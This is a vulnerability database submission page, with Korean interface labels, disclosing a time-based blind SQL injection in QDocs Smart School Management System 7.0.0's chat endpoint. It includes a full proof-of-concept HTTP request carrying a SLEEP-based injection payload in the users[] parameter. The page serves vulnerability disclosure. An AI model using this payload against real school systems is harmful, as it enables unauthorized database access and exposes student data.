제출 #407385: QDocs QDocs Smart School Management System 7.0.0 SQL Injection정보

제목	QDocs QDocs Smart School Management System 7.0.0 SQL Injection
설명	A time-based blind SQL injection vulnerability has been discovered in the QDocs Smart School Management System, specifically in the chat system. The vulnerability exists in the users[] parameter of the /user/chat/mynewuser endpoint. This allows an authenticated attacker, with student privileges, to inject malicious SQL queries that can delay the server’s response using the SLEEP() function, thereby confirming the presence of an injection vulnerability without directly revealing data. This kind of attack can be leveraged to infer sensitive information or cause unauthorized actions within the database, which could compromise the integrity and confidentiality of the system. Impact: Execute Arbitrary SQL Commands Infer Sensitive Information Compromise Data Integrity Proof of Concept (PoC): POST /user/chat/mynewuser HTTP/1.1 Host: [placeholder-host] Cookie: ci_session=93mpnv1mlhiivbkbd83c6kfd36bcjaft Content-Length: 79 Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126" Accept-Language: en-US Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: application/json, text/javascript, /; q=0.01 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Platform: "Linux" Origin: https://[placeholder-host] Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://[placeholder-host]/webtest/user/chat Accept-Encoding: gzip, deflate, br Priority: u=1, i Connection: keep-alive users%5B%5D=1'+AND+(SELECT+3220+FROM+(SELECT(SLEEP(5)))ZNun)+AND+'WwBM'%3d'WwBM Discovered By: Jobyer Ahmed
원천	⚠️ https://github.com/bytium/vulnerability-research/blob/main/Advisory%20for%20Time-Based%20Blind%20SQL%20Injection%20in%20QDocs%20Smart%20School.md
사용자	suffer (UID 74855)
제출	2024. 09. 12. PM 11:41 (2 연령 ago)
모더레이션	2024. 09. 13. PM 03:09 (15 hours later)
상태	수락
VulDB 항목	277435 [QDocs Smart School Management System 7.0.0 Chat /user/chat/mynewuser users[] SQL 주입]
포인트들	20

◂ 이전 개요 다음 ▸

Want to know what is going to be exploited?

We predict KEV entries!